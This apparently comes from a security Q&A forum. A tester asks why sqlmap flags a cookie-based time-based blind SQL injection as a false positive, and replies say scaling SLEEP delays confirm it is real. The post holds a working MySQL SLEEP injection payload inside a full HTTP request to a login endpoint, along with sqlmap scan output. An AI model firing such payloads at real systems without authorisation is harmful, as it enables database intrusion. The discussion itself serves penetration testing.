# Time based blind SQL Injection

Tags: mysql, sql-injection

With the following request in the Burp Suite's repeater, I noticed that I'm able to execute the `SLEEP` query on my target server.

```
POST /login HTTP/1.1
Host: example.com
Origin: https://example.com
Cookie: _sessionToken=filzxrpoiahflw_1618561576'%2b(select*from(select(sleep(20)))a)%2b'
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Content-Length: 39

username=admins0&password=m02pih57d
```

However, when I test the endpoint using SQLmap, it says that it's a false positive.

```
[xx:xx:42] [INFO] Cookie parameter '_sessionToken' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided risk (2) value? [Y/n] Y
[xx:xx:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[xx:xx:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[xx:xx:01] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[xx:xx:06] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[xx:xx:09] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[xx:xx:13] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[xx:xx:19] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[xx:xx:23] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[xx:xx:27] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[xx:xx:31] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[xx:xx:35] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[xx:xx:39] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:43] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[xx:xx:48] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[xx:xx:52] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[xx:xx:12] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[xx:xx:16] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[xx:xx:19] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[xx:xx:23] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[xx:xx:27] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[xx:xx:31] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[xx:xx:35] [INFO] checking if the injection point on Cookie parameter '_sessionToken' is a false positive
[xx:xx:40] [WARNING] false positive or unexploitable injection point detected
[xx:xx:40] [WARNING] Cookie parameter '_sessionToken' does not seem to be injectable
```

I was wondering if it's possible for an attacker to execute `SLEEP` query without the end point being injectable (and by extension not be able to dump the data)? If yes, how (What would the server code look like)?

Answer (score 0):

If you can execute it through the repeater, then it is not a false positive.

Monitor the response time when you increase the time, as shown below.

sleep(2)

> [image: Sleep 2]

sleep(20)

> [image: Sleep 20]

If you get the responses like these, then the attacker can execute the sleep query the same way.

Comment: I've tried it already and it works. The response time for the query in the question does take more than 20 seconds however, sqlmap says it's a false positive. I wonder why!

Comment: I got it. SQLmap could have missed it due to some firewall or due to the bull amount of payloads triggered. However, if this resolved your concern, then don't worry.